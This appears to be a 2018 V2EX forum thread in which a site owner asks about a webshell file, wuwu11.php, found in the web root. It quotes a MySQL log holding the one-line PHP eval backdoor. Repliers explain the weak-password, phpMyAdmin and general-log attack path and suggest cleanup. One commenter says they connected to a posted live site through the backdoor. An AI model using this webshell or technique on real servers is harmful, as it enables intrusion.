Home Sign Up Sign In
fzxml
V2EX  ›  PHP

求助各位 v 友,网站根目录多了一个 wuwu11. PHP 的文件

  •  1      
  •   fzxml · Mar 31, 2018 · 6657 views
    This topic created in 2988 days ago, the information mentioned may be changed or developed.

    阿里云云盾检测到发现后门 webshell 根目录多了一个 wuwu11.php 的文件, 内容是:

    D:\web\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
		65264 Init DB	mysql
		65264 Query	SHOW TABLES FROM `mysql`
		65264 Query	SHOW TABLE STATUS FROM `mysql`
		65264 Query	SELECT CURRENT_USER()
		65264 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
		65264 Query	SELECT CURRENT_USER()
		65264 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
		65264 Quit	
180330 19:55:36	65265 Connect	root@localhost on 
		65265 Query	SET NAMES 'utf8' COLLATE 'utf8_general_ci'
		65265 Init DB	mysql
		65265 Init DB	mysql
		65265 Query	select '<?php @eval($_POST[h])?>'
		65265 Init DB	mysql
		65265 Query	SHOW TABLES FROM `mysql`
		65265 Query	SHOW TABLE STATUS FROM `mysql`
		65265 Query	SELECT CURRENT_USER()
		65265 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
		65265 Query	SELECT CURRENT_USER()
		65265 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
		65265 Query	SHOW TABLES
		65265 Quit	
180330 19:55:37	65266 Connect	root@localhost on 
		65266 Query	SET NAMES 'utf8' COLLATE 'utf8_general_ci'
		65266 Init DB	mysql
		65266 Init DB	mysql
		65266 Query	set global general_log = 'Off'
  • query
  • MySQL
  • select
  • init
    15 replies    2018-08-20 15:51:16 +08:00
    111111111111
        1
    111111111111  
       Mar 31, 2018 via Android
    注入漏洞吧,服务器权限也没设置
    cyn
        2
    cyn  
       Mar 31, 2018 via Android
    只会执行<?php @eval($_POST[h])?> 吗?
    wukaichao
        3
    wukaichao  
       Mar 31, 2018 via iPhone
    注入吧,直接在读表了。
    manus
        4
    manus  
       Mar 31, 2018 via Android
    都脱裤了 还问
    zjsxwc
        5
    zjsxwc  
       Mar 31, 2018
    这个吗?

    http://www.hanyadichan.com/
    honkew
        6
    honkew  
       Mar 31, 2018
    @zjsxwc 竟然发出来了,我用 Cknife 连了一下 可以连上
    Les1ie
        7
    Les1ie  
       Mar 31, 2018
    @honkew V2EX 上发自己服务器的一句话木马 翻车现场
    rb6221
        8
    rb6221  
       Mar 31, 2018 via Android
    哈哈哈哈哈
    sinver
        9
    sinver  
       Mar 31, 2018
    phpmyadmin 及各种弱口令.....感觉重装系统 及重新搭建网站和权限控制吧....
    fange01
        10
    fange01  
       Mar 31, 2018
    @Les1ie 翻车现场,竟然还不处理。
    @honkew 哈哈哈哈
    lifeintools
        11
    lifeintools  
       Mar 31, 2018
    还有网站源码。。你还不设置权限。。。。。
    xuyl
        12
    xuyl  
       Mar 31, 2018
    php 码农安全意识堪忧啊。
    Tink
        13
    Tink  
    PRO
       Mar 31, 2018 via iPhone
    fanglongzong
        14
    fanglongzong  
       Apr 6, 2018
    跟楼主一模一样的情况。

    完全是技术小白,不知道要怎么办……
    maoxs2
        15
    maoxs2  
       Aug 20, 2018
    1. 不是我搞得,只是碰巧碰见了这个后门好几回
    2. 攻击点是 MySQL 弱密码+phpMyAdmin
    3. 注入点是日志文档保存路径修改至 apache 服务器解析文件夹(通过 phpinfo 获得 /phpstudy 等框架猜解)
    4. 解决方法删除它后续步骤放的别的后门程序( exe+服务),删除 wuwu11,修改 MySQL 弱密码,删掉 phpMyAdmin 或者修改路径或者加 http 认证啥的
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   5796 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 70ms · UTC 02:59 · PVG 10:59 · LAX 19:59 · JFK 22:59
    ♥ Do have faith in what you're doing.